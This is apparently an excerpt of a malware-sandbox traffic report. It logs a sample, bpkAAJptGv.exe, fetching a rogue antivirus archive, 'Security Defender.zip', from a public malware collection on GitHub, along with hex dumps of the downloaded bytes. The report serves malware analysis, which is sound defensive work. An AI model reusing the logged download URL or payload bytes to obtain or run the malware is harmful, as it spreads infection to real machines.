                                                                                                                                                            2022-09-29 12:45:22 UTC30431INData Raw: 68 bd 93 1a 7d 77 4b ef 1c b4 6d 15 77 8b e4 03 32 46 88 03 26 fa 08 0c ab 4b 2e 57 e1 9f fe 8c 7a 76 90 3c 51 43 44 19 d0 d4 2a 65 78 ac 92 ee 6f e4 6b 0c e6 aa c8 ce af e0 76 51 9f 77 60 bb 5a fc dc 8c 03 35 45 68 f1 fc c7 3e 4b ab 81 cc 3f 95 c2 1a cd b3 63 1e bb 1a 13 05 e4 7c 96 d4 d0 97 c1 8d 89 b5 c6 45 7f fb f5 fd c1 b6 06 72 4e cd cd 91 08 35 90 e7 7b 7f 5c e0 57 8f 71 6d 9b 71 f9 df f1 c9 43 2f 42 56 0a 34 10 20 a9 ea a6 6c 89 14 75 54 03 9c 69 09 b5 2c 38 f2 2d 43 48 a0 e1 bb 32 07 6e c7 03 d0 df 1d 18 fc c2 23 50 aa 49 24 32 05 e2 a7 0e b6 ed a2 4b 9f dd a0 13 67 47 7a f4 68 9c 28 8a 86 66 89 2b 0b f8 7a 37 52 80 14 60 92 e6 c8 d4 d0 0f 40 10 8d a4 9f 63 dd c7 c9 f9 9f 84 c4 db 92 d7 93 c2 34 a2 d3 f0 11 9d 9c 46 50 1e 72 0e 7d b1 23 e5 fe fe
                                                                                                                                                            Data Ascii: h}wKmw2F&K.Wzv<QCD*exokvQw`Z5Eh>K?c|ErN5{\WqmqC/BV4 luTi,8-CH2n#PI$2KgGzh(f+z7R`@c4FPr}#
                                                                                                                                                            2022-09-29 12:45:22 UTC30447INData Raw: 06 08 3f a6 a3 0c 48 4f 94 af bd 6f 72 08 d9 f6 ff cc 7b 4a c8 5d 10 f8 80 21 b9 ca 3c ae 38 e0 62 3a b7 f3 d9 c8 5c fe 7e d7 c6 b4 d3 45 d7 13 81 66 23 5c 68 98 cd 73 72 a1 79 cf 0b 05 c1 ad d2 1e 0f c1 6f 16 57 ca 7f 8f ad 90 ca d0 f4 e9 5c 29 1f 0e ed 2c 07 72 bd de 3e 69 73 85 23 22 99 b1 c2 f5 3e 19 c7 a8 c8 2b 14 52 d8 d5 11 8e f0 b7 00 f8 39 25 7b 20 6a d5 f3 d8 42 33 0e a1 91 d0 5d 29 15 55 67 ba b1 15 e2 37 9e 23 0b 45 94 97 4f e4 6e 76 65 da cf ed 8e 33 59 8b e5 bb 2b 24 1c a2 10 fe a2 e3 8b 4b 99 5b 01 7e 6c f4 1e 1e af 74 9f 9c 8f f4 70 00 11 f0 33 31 a6 81 e7 ed fd 2d 5c 2b 48 52 9b 6c 81 65 ae 5a 43 36 e2 3c 9a a1 47 97 34 78 97 cb 4f 70 51 aa 7b c0 96 11 c0 12 8f 91 cf 17 b1 40 32 7c 99 d0 f8 85 94 3f 86 64 18 3e 10 a2 4e e9 68 2f 28 6e a8
                                                                                                                                                            Data Ascii: ?HOor{J]!<8b:\~Ef#\hsryoW\),r>is#">+R9%{ jB3])Ug7#EOnve3Y+$K[~ltp31-\+HRleZC6<G4xOpQ{@2|?d>Nh/(n
                                                                                                                                                            2022-09-29 12:45:22 UTC30463INData Raw: 0e b3 db 27 6b 2d c5 1e 6f 71 89 48 c9 af 29 f3 e7 ce 0a b2 1e 92 59 86 02 4e 87 a6 df 46 5f a3 41 11 cf 3c 2b 02 bb 7e 39 9b 92 15 39 c4 e3 f8 19 28 ae 7b c4 f3 16 79 84 1e 28 6d c3 ac c2 62 46 de 60 c5 77 09 3f be 63 c5 ee 85 65 76 f3 7b 55 7e 74 c9 92 b0 a8 c1 6a 12 7b 41 76 f0 5d ea ec 88 3f d8 1a 82 34 e4 3d da 15 f5 f8 a4 04 f0 89 ee 43 91 86 d3 3d 2d e3 6b 54 00 cc ab 7e 54 32 28 81 f2 d3 b2 be 88 59 b2 c9 d1 5a e8 cf 30 6d 2f 16 0b 32 b9 fa 2f a3 6c 7a b2 b0 15 ca 7a 41 8b 0b df 18 e2 4c ad aa e2 b1 b6 ba 74 17 90 0b 2a 1e 80 cb d7 8b 06 99 51 d6 b3 89 16 a8 3d 46 75 96 06 97 d7 aa 10 b8 64 5c 5a fe 0d 66 99 c1 30 74 d2 6b 31 0a 6f e0 75 e4 98 37 e1 4a ca 58 27 c5 47 74 52 6d 8d c1 70 3b 1b 51 b7 ca 8c 15 12 4b a0 17 e3 c3 b1 26 ec 3d 52 96 78 30
                                                                                                                                                            Data Ascii: 'k-oqH)YNF_A<+~99({y(mbF`w?cev{U~tj{Av]?4=C=-kT~T2(YZ0m/2/lzzALt*Q=Fud\Zf0tk1ou7JX'GtRmp;QK&=Rx0
                                                                                                                                                            2022-09-29 12:45:22 UTC30479INData Raw: e8 5b 53 8f fc 93 15 e1 6f 9e 7e 7a 99 ab 9c 27 86 89 32 ff 7f 86 5d af c8 fc 11 87 d1 10 ac ad 83 a5 ab 11 ab 44 19 58 9b 9f 2a 9e 2c bf b9 96 f1 44 be 54 9a 05 80 23 46 2a 78 93 59 7f 75 a0 7e 65 fa 14 78 5b 4a 95 31 4d 61 57 a3 cc 16 60 fa 06 7c 94 06 dd a3 20 3c f4 5d 17 ab b3 44 b4 23 5a 40 31 eb 88 b5 48 00 cf ed f2 33 6d f3 73 80 2d 6e 12 c4 6a d1 d1 a1 64 02 a3 20 38 9f 8e c5 b4 a0 e0 9c 7c bd b6 21 22 42 a1 23 19 74 b4 e4 a9 d6 ee 8e 40 c8 88 5c 50 a1 d5 fa aa a1 da 1b 8d 24 21 d3 90 71 91 7b 52 48 a4 33 d2 d9 66 52 1a b1 c6 c8 d1 fb 8a 67 0f f9 01 df ea 39 cc fa f1 5b 6f 23 c3 04 c8 30 84 57 c2 b7 27 67 85 5d 5f 0a 2d 69 5e a2 91 49 bc 68 85 6c 47 62 b5 38 d8 3f f1 0c fb d2 08 59 96 83 60 47 77 b4 9d 4b 0d 83 9b 03 15 a8 16 0c ab 2d 84 7c ca de
                                                                                                                                                            Data Ascii: [So~z'2]DX*,DT#F*xYu~ex[J1MaW`| <]D#Z@1H3ms-njd 8|!"B#t@\P$!q{RH3fRg9[o#0W'g]_-i^IhlGb8?Y`GwK-|
                                                                                                                                                            2022-09-29 12:45:22 UTC30495INData Raw: 0a d3 ed be b3 61 b8 b8 e2 7e 73 a1 be e3 aa ab 8c 73 85 d8 6e bd 14 88 3a 7e 06 13 01 a9 77 1f 93 27 6c 9d 2e e8 75 f6 05 27 a6 f1 60 a9 24 70 af 07 0e 7b 4b 1d e5 de cb 27 12 e4 7f 14 7a 2c 3b b8 78 2f d3 8b 2e 3c 41 32 ac 39 7b 02 c3 d9 e9 69 e0 60 4b a5 a2 0e 59 d4 83 64 cd f4 74 de ca 4f 40 9f 84 15 d0 dc 8c be b2 b8 0c 91 45 71 1f ae 14 b9 2f 97 9d b4 44 cf 3c 02 74 0c 3b c8 0e fd 88 cf 06 9d bb e3 69 b9 7e 39 0f f5 56 27 bf f5 d7 34 05 fc 4f ab 35 f6 b0 6b 79 88 9e 12 f6 05 57 63 e7 10 03 7d be 14 95 67 ac fb cb 5c bd 38 08 5d ae da b6 ac b4 ca 22 75 b5 8c d9 cf de 0e 37 c5 a4 e8 aa b6 da 15 c4 4a d0 40 68 f8 10 98 72 d4 84 0c 41 5c 22 85 34 ed 2f e9 af 15 d0 a1 57 ab af ee 4c 64 da c2 d4 89 84 1f f0 cd 2a 5d f7 46 e8 3c 1e 66 f4 ee 34 93 f4 0b 77
                                                                                                                                                            Data Ascii: a~ssn:~w'l.u'`$p{K'z,;x/.<A29{i`KYdtO@Eq/D<t;i~9V'4O5kyWc}g\8]"u7J@hrA\"4/WLd*]F<f4w
                                                                                                                                                            2022-09-29 12:45:22 UTC30511INData Raw: f9 50 9c b0 97 c7 6a 76 70 92 3e 81 72 87 44 01 54 78 95 2f 58 f7 51 c9 94 ae 9d f5 ee e4 cf 4c 72 a1 2b 26 11 65 cc b7 18 c5 70 9a 4e 55 3a 2c 26 9d d5 30 4e 03 b8 d0 f3 46 c7 2f 65 5a cc d3 a7 79 66 20 59 7f e2 a2 b7 1c 68 28 b5 10 83 01 ef 72 71 1d 07 14 d4 19 40 cd 59 2b 45 c4 d7 77 64 c3 35 55 89 bb 8b e3 a5 88 cd 57 a7 99 1b 34 41 bc 86 60 98 bc cb 5a 29 3c f9 94 ea fa ae 49 a6 94 bc aa 67 c1 65 1a 33 87 56 aa d7 cd d7 2c 17 21 63 38 af a5 f3 07 64 72 c3 af 91 f5 59 5e 4e f6 18 fb c1 4c 73 c2 ca 7c 10 69 1d 40 06 5f 57 c6 69 7d e3 13 fe bc 28 a3 95 d8 df 98 d9 b4 6c be d5 2e 3e ee c5 0b b0 b3 9b 62 1a 34 6c 59 3f 7a 6f 57 77 78 0a af 0b 03 36 96 96 41 16 f9 72 3a bb c9 51 b9 b2 9b c0 1a 72 e1 51 f3 0f 84 33 44 f2 2f f0 52 fe cf 6b 1a 21 19 4d 93 b7
                                                                                                                                                            Data Ascii: Pjvp>rDTx/XQLr+&epNU:,&0NF/eZyf Yh(rq@Y+Ewd5UW4A`Z)<Ige3V,!c8drY^NLs|i@_Wi}(l.>b4lY?zoWwx6Ar:QrQ3D/Rk!M


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            114192.168.2.649765140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:22 UTC30521OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            115140.82.121.4443192.168.2.649765C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:22 UTC30521INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:09 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Defender.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:22 UTC30522INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            116192.168.2.649766185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:22 UTC30524OUTGET /Endermanch/MalwareDatabase/master/rogues/Security%20Defender.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            117185.199.110.133443192.168.2.649766C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:22 UTC30524INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 1423299
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "4e2f97a693b42bbc4ce7b3f548d6798cfcb4829d26d0a219f2fbeb3332111530"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 080B:4559:687049:6EBFD9:63359362
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:22 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6957-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455523.531134,VS0,VE171
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: bbd7d535122129b31eee82a8f47df2cadbf6ce28
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:22 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:45:22 UTC30524INData Raw: 50 4b 03 04 14 00 01 00 08 00 95 9e 9e 43 97 d5 73 7c ff b6 15 00 00 f8 16 00 1f 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 53 65 63 75 72 69 74 79 44 65 66 65 6e 64 65 72 2e 65 78 65 99 68 63 5c 94 3d bf 63 47 e4 03 fb 1f c1 b9 4b 20 11 2d 75 48 62 84 af 67 6b 4a 77 75 39 5b 1d 02 85 b0 24 36 21 49 0f 58 81 53 67 5b f9 24 6a d8 ea 82 da 51 26 14 8f bd 4f dd 51 7d f0 d8 d1 cc e5 9c b9 dc 08 c1 ad ec 4e 39 18 4a 21 c9 21 be fb 52 0b 0f 59 6c 23 9f f1 34 d2 ec c1 7f 93 35 11 14 3e ab 80 17 a2 b2 24 c6 3d 5b f4 66 4a 22 1d 94 00 0e 54 5f c3 dc 4a 42 eb 35 61 3a 44 06 ba a0 fc e5 08 55 c0 85 99 e8 cd f7 78 ae 86 5d 33 30 3f 92 ef 90 fe ee c4 90 a1 df 26 b7 20 a9 1e b8 31 9e 24 00 ce c9 50 af 1a f1 9e c4 46 03 86 41 f3 24 e2 fa 15 24 a2 97 c6 0d ff 8f 21 a1 b5
                                                                                                                                                            Data Ascii: PKCs|Endermanch@SecurityDefender.exehc\=cGK -uHbgkJwu9[$6!IXSg[$jQ&OQ}N9J!!RYl#45>$=[fJ"T_JB5a:DUx]30?& 1$PFA$$!
                                                                                                                                                            2022-09-29 12:45:22 UTC30526INData Raw: 24 9d 1f 34 73 62 b0 e9 af 39 bf 71 f1 01 f4 6e b2 e6 bd 59 7a 35 0f d1 91 77 83 f1 bb 83 95 f3 03 d5 c3 84 c6 8f 5f 1d c6 49 c3 79 9d 0c ac 40 3a 97 29 ee e7 54 38 03 5b 76 c7 be 40 a9 6e 9a 6e 38 37 a4 6d 40 b6 0d 9c a6 fa 39 38 4b a9 0c a4 fb 88 60 b4 79 7b ee c0 aa a6 15 07 13 95 17 f8 ea 88 3b d4 ec f5 a1 38 81 f5 51 7c 37 6c f7 7b 94 de 3b 06 c8 60 3a c6 d1 5b 21 19 e6 e5 e9 a0 ec ec b5 ac 95 55 54 61 f6 7b 50 49 64 00 48 c2 2f a7 af bf a4 09 33 0b bc de 81 9d 1e a0 c5 08 3d ac 97 60 18 18 2b 36 d5 57 78 87 18 f9 7f 32 38 00 7a 37 18 03 84 14 29 70 bb a0 11 32 d9 89 28 be 00 6a 9c 34 5f d4 a2 5f bb f6 59 4d 03 6f 00 ab 53 13 5f 9c ef 54 b6 f8 61 f5 71 97 fb 73 37 df 9c 50 1f a0 5e e0 80 b1 0d a1 5f da 50 ed 7a d8 1e b8 a3 4c 7e 67 e8 dd 05 4b b0 97
                                                                                                                                                            Data Ascii: $4sb9qnYz5w_Iy@:)T8[v@nn87m@98K`y{;8Q|7l{;`:[!UTa{PIdH/3=`+6Wx28z7)p2(j4__YMoS_Taqs7P^_PzL~gK
                                                                                                                                                            2022-09-29 12:45:22 UTC30527INData Raw: 35 a6 44 4f 53 9c f3 c5 b6 02 13 03 15 4b e3 ba 0e f6 35 10 1a 3f af 1e 57 98 da c1 66 6f 50 65 59 80 29 b6 c9 e9 55 f4 82 90 ea 10 96 24 6d a4 5f b9 e4 e4 84 ca cb 98 53 a2 97 91 79 f4 f1 f0 a2 6c 21 fa 6c a8 19 41 f5 d8 dc ee b9 ce 4d a8 5b fb 98 c2 3a f1 cb 9a eb e6 5c cd 3b 08 d7 f0 e3 96 c5 59 15 7e ba d5 a9 3a 9e 86 cc 78 84 db 4f 2e be 9e 8c d5 39 3d cc 23 1a 85 79 98 0f 56 32 a7 e3 12 22 04 16 7d 8a 60 4f dd 97 78 b8 fc d6 c7 8e cb 80 e5 80 c8 52 ae a4 e6 ce f1 06 08 2e f6 79 41 38 20 a2 19 59 ab 41 88 64 95 3a 52 69 03 86 5e b3 f1 76 5f 67 6f 24 6f 56 f9 b7 73 58 cb b2 0d 39 d5 11 29 1e bb cd 75 0d e0 22 7c a6 ef 61 26 cc 9d 18 88 dc 6f 35 d5 c5 eb 13 08 3c fe ac 74 f0 47 db b1 06 c2 fe c3 50 08 1b 65 32 37 67 9e d1 30 42 37 09 bb 2f 47 90 44 43
                                                                                                                                                            Data Ascii: 5DOSK5?WfoPeY)U$m_Syl!lAM[:\;Y~:xO.9=#yV2"}`OxR.yA8 YAd:Ri^v_go$oVsX9)u"|a&o5<tGPe27g0B7/GDC
                                                                                                                                                            2022-09-29 12:45:22 UTC30529INData Raw: 1d 53 b0 f8 a5 d0 59 e8 f4 16 18 af d6 2f 35 06 95 d2 f5 5d 24 84 76 7e 5d 0a 0b c4 c3 4e af f4 38 59 1e 0f 73 4c 8a 2f f7 af 9a a7 cd 85 99 a7 98 52 b0 3a bc a0 16 96 87 a9 b1 74 8e 2f a3 ad de ed 91 27 21 fc 37 65 aa f6 70 ff a6 11 fa c9 d2 9e 40 18 b2 ba 7c 0c 47 33 f3 5c 79 8b ae f7 cb e8 5b 57 5e b0 01 1b 31 76 82 fa 2b 64 b3 59 29 39 05 21 b7 ac 4a 93 e7 36 7f d7 40 4e 4b 99 f3 c0 5d fd 53 a8 db 29 8d b5 d1 b7 57 64 15 90 ca 39 62 4b ba 67 9d 7d a5 51 ad 0a e3 3f 0d 69 7f 4a 8f f1 4b 1d da 45 7c e1 11 34 7b 39 5f c3 4d 0c dc b4 d0 45 15 ef fe d5 c7 fe f4 8c e9 80 89 b0 15 0b ae 41 31 33 67 80 b5 40 c9 ac 3a e5 3c e1 21 62 18 eb 7d 02 4f 6e be d0 8f 4e 37 20 b7 c2 e9 7d 41 d6 8a b1 f2 74 89 0a 5d e4 45 36 01 66 b2 b7 25 79 8b 68 49 57 d3 51 ca 46 9c
                                                                                                                                                            Data Ascii: SY/5]$v~]N8YsL/R:t/'!7ep@|G3\y[W^1v+dY)9!J6@NK]S)Wd9bKg}Q?iJKE|4{9_MEA13g@:<!b}OnN7 }At]E6f%yhIWQF
                                                                                                                                                            2022-09-29 12:45:22 UTC30530INData Raw: 68 a4 2e f6 5d 66 62 fc 78 b4 85 b7 54 b0 9b 59 8d 60 d0 20 7b ea 50 48 88 0f d5 e6 59 4c 52 92 52 4a d4 66 6b c8 45 06 1b 4f 7e 6f 1d ec a8 7b 84 cb 39 44 a8 55 4d d7 03 7f 7c 03 80 2d 84 9f 5a 6c fd 4e dc eb d8 c8 93 7b de 84 6a 13 67 ce 4f a6 4e 53 d8 e6 45 44 84 2f 4d 16 a6 9c b3 68 7b 11 9a c8 89 d8 3c af 0b 17 30 92 12 31 f3 2e 9b ba c2 b0 d2 90 42 c3 d9 e6 92 93 25 78 a4 3e 9b 6e e2 43 43 af 1d 76 7b 28 c4 ae de a4 3d a1 04 b8 28 a1 79 84 3e ce ef 0f ac 4b a2 67 fc f0 ba 46 0e 25 cb 8b ff 83 77 5e 02 50 cf 61 ca 77 93 63 a1 18 a1 38 f8 da 70 1a ef 16 d4 a9 a1 1d 70 00 82 86 a2 62 d6 f2 c3 12 f4 a9 37 0d 38 e1 d9 b4 84 7b 93 42 f9 9c 33 7b 44 79 05 b7 99 ab 56 02 9b 90 e5 c9 e9 45 cc f8 1c d5 76 46 6e 19 21 68 43 19 e1 ca 12 26 64 a2 7f c6 ba 8e d8
                                                                                                                                                            Data Ascii: h.]fbxTY` {PHYLRRJfkEO~o{9DUM|-ZlN{jgONSED/Mh{<01.B%x>nCCv{(=(y>KgF%w^Pawc8ppb78{B3{DyVEvFn!hC&d
                                                                                                                                                            2022-09-29 12:45:22 UTC30531INData Raw: 17 e9 85 51 65 a2 26 a4 11 e9 d7 34 fa e5 53 c4 dd 3c ad 18 cf fb 2a a5 13 54 ad ba ae a8 ce 76 09 af 68 8b 09 5a af b6 c2 5d 2a 67 49 df aa ee 4f c9 6e d7 d4 38 93 4a d2 17 69 99 a3 e3 a6 08 d2 94 bf e3 6c 95 49 c3 dc dc a2 17 1c e3 68 fc 18 36 8f 43 a0 87 63 6e 2a 98 83 07 ea 34 9e ab ba 38 4d dd 4c 05 07 bd 68 c7 c8 9a 0a 51 20 84 45 42 79 ec e2 dc cd ae 74 ca b9 21 b5 d0 1b 99 e5 45 a6 d6 d2 75 d0 d0 c4 fc 18 bd d5 33 d3 eb 7c 60 59 38 b7 fd dc cf dd bd 08 ac 17 dc f6 87 d5 09 66 83 07 d4 ca 74 28 89 9b 2c 47 2a e2 a9 cc 7d 95 94 a2 5f 15 ca 79 37 fb 53 f0 03 7f eb ca 43 f3 32 06 cd d4 54 9c b2 45 b8 e4 a9 5c 04 3e 8d 0e 93 61 be 5e 5e e1 fb a4 04 0d 72 37 24 db 40 80 fd f2 e0 a7 84 9c 29 fa 8d a1 9c 03 4f d7 39 9b 2a b8 e4 d9 4f 84 fd 01 3b 1a 59 6b
                                                                                                                                                            Data Ascii: Qe&4S<*TvhZ]*gIOn8JilIh6Ccn*48MLhQ EByt!Eu3|`Y8ft(,G*}_y7SC2TE\>a^^r7$@)O9*O;Yk
                                                                                                                                                            2022-09-29 12:45:22 UTC30533INData Raw: c9 a7 ea 47 ae 61 39 e7 46 af f2 0a 64 9c df e0 10 48 ab c2 fc 56 bb 2d cc 8d 8b 82 9f f6 07 82 ef 60 22 e4 1c 12 bc fc d3 55 af 3a 1b 10 6e 84 d6 a1 e2 e1 65 94 06 47 a9 b3 b0 ce 71 6e c2 1a 9b 69 19 3c 9b 6a c9 03 6f 23 c3 57 23 79 1a 6a 26 09 12 31 97 fe 2b 84 29 84 6a f3 92 46 7b 93 20 23 3f 56 d2 df d0 d7 9d 33 1f 45 6a c3 84 b5 84 fe 00 57 1b d6 2c 7d f4 dc dd 3e c6 1d f2 17 51 13 f1 1e ec b9 8e 26 31 78 16 02 1d f2 d8 07 77 1a de 4a 01 51 61 5a d5 b5 9e 13 24 af 62 c3 d9 38 f5 34 2a be c7 a1 db 76 b0 00 4a b3 f1 e4 ce 54 7a bc 70 5a 2a 47 69 e1 c9 8b 9c f6 11 f8 8b 84 79 97 42 11 b1 32 31 42 50 91 51 4d f9 f7 0a 4a 31 68 fc 3a a9 3e d9 70 2f b7 96 72 75 85 5c a8 18 c7 ce ae 74 d5 fb 70 39 12 81 58 7a 9f dc 4a 0a cb f4 75 aa 11 f0 3d 5e 0b c3 47 17
                                                                                                                                                            Data Ascii: Ga9FdHV-`"U:neGqni<jo#W#yj&1+)jF{ #?V3EjW,}>Q&1xwJQaZ$b84*vJTzpZ*GiyB21BPQMJ1h:>p/ru\tp9XzJu=^G
                                                                                                                                                            2022-09-29 12:45:22 UTC30534INData Raw: 9d ad 92 cb db d2 f7 9a 7a cb 21 93 8b b0 b5 ba d2 87 0a 43 e5 4c ec d6 bc 74 b5 11 1f c8 97 e5 00 e0 0c f1 f6 23 08 4c 10 7f 8f 75 8d 02 d6 19 77 90 fd 32 ce 0f 43 f1 63 4c c9 63 20 4c 02 a5 7c 62 f0 70 e3 b0 3c 91 09 82 9a a9 0f 34 e9 e7 b0 e3 e1 3b 7c 48 f6 13 29 ee ca 1e da 52 e8 b4 53 4e 84 78 29 da c6 87 4e ce 79 dd 1c 30 58 86 da 8c 64 7c b7 4b c2 a3 4d a4 e0 75 9d 76 5a 83 81 c2 38 4c 03 97 66 3e f3 2b fc 20 07 37 41 c5 21 57 8e fd 41 eb 4a e6 b4 25 98 d9 b8 18 cc be 2b f1 b8 d5 ae cc eb 56 1e ca 34 42 22 18 01 61 a3 4b 30 7f c7 92 e2 20 77 28 9a 83 ec 12 c9 88 e0 99 e8 1c ab d2 73 52 28 f9 db cd 65 85 19 32 9c 79 f1 8d f5 b6 35 fb 2e eb 50 f2 84 0d db 54 18 3d 0c 44 89 e0 96 2d 6b 71 72 a3 67 15 0c a7 2a 26 b4 05 99 3b 33 2e 57 bf 91 de 1f 87 1f
                                                                                                                                                            Data Ascii: z!CLt#Luw2CcLc L|bp<4;|H)RSNx)Ny0Xd|KMuvZ8Lf>+ 7A!WAJ%+V4B"aK0 w(sR(e2y5.PT=D-kqrg*&;3.W
                                                                                                                                                            2022-09-29 12:45:22 UTC30535INData Raw: 26 4b ed 09 66 46 1f dc 35 76 25 3f 7b e1 93 4b 4a 0e 7e b1 a4 29 bb 22 92 02 a8 f3 20 e3 5b 94 cf 2e 04 d9 32 69 37 a4 36 14 39 21 46 50 5c b3 da c4 fe 51 47 0d b8 1c 5a c0 70 f3 5f 71 e3 40 cf 6d 06 e7 e3 76 17 d1 f6 27 00 0a 30 17 b8 be 2b db 8a cd c7 d0 74 63 25 eb f1 d5 6b d1 48 88 9c cd c4 72 13 50 62 cc 51 6e fb 7d 30 d3 cd a9 63 f0 ce 00 8c 1d 8b a3 05 b0 a1 47 3f b0 2b 15 f5 b6 ed 22 99 87 2b 6c 68 2a e2 4d a0 9e a5 f3 6a 46 96 a9 3c d2 df b6 57 ea e3 c2 8b 3b 3f 58 b0 be c4 48 c2 d0 56 9a 35 ab 12 be 0f a3 ec f1 eb 64 73 f0 50 95 1e e3 ec 7b ad 39 27 c1 80 1e e2 c0 b5 13 6c 66 c4 8f de 71 42 74 a7 e9 01 3a 5f 82 ee 45 da 70 31 64 a3 4b fd 73 84 79 2a 67 88 54 2f 01 44 b8 c3 bc 7a dc f3 27 a7 c9 d6 35 08 e7 2c 3a 55 bc 29 c9 30 9d 6e ff f4 a1 89
                                                                                                                                                            Data Ascii: &KfF5v%?{KJ~)" [.2i769!FP\QGZp_q@mv'0+tc%kHrPbQn}0cG?+"+lh*MjF<W;?XHV5dsP{9'lfqBt:_Ep1dKsy*gT/Dz'5,:U)0n
                                                                                                                                                            2022-09-29 12:45:22 UTC30537INData Raw: 48 29 e8 38 15 a4 08 d3 6f 9f e6 30 eb 2b cd de ab 38 0f ef 7e bb b9 f8 24 15 d9 20 96 26 6b d4 00 3d de c8 7a 29 b9 bc 31 77 9c f3 bd 3b f1 c5 a1 70 24 fa be 8c b5 90 13 cd d5 73 8a 6b 7d 01 52 89 3d 4c 22 ea 1f bd 00 f2 b6 b6 8c c8 9c e8 cf 5f a2 5b 44 10 a0 63 e8 7f e0 31 05 c7 12 82 30 30 74 d5 c3 ec 29 68 95 59 93 c9 a9 ae d2 40 f0 fe 63 7f de 46 a8 57 f9 49 bb 2a 0a 24 3e 7c dd 85 ae 3f 4e 9f a5 3f 6c 2e db 98 77 0c d9 4d 6a 12 f5 15 3c 40 22 ff 15 bf 7f 82 25 1f b2 7b 57 1b 90 cd c3 1b b7 19 76 4d e2 b7 16 dc 81 53 84 39 6e 22 7e ba 3b 51 e8 c1 52 62 a3 7c 26 de 7c cd b2 0d 2c 01 a9 21 ce 3a f9 2d cc af d7 02 07 23 0b a9 41 b5 1b f4 e0 79 d3 f2 3c 20 5b 9e d2 00 1b 31 51 df d6 e1 6a 0b 27 c9 97 a0 58 d5 37 ab 2b 08 3c 8c a4 41 53 f5 ca 34 93 04 15
                                                                                                                                                            Data Ascii: H)8o0+8~$ &k=z)1w;p$sk}R=L"_[Dc100t)hY@cFWI*$>|?N?l.wMj<@"%{WvMS9n"~;QRb|&|,!:-#Ay< [1Qj'X7+<AS4
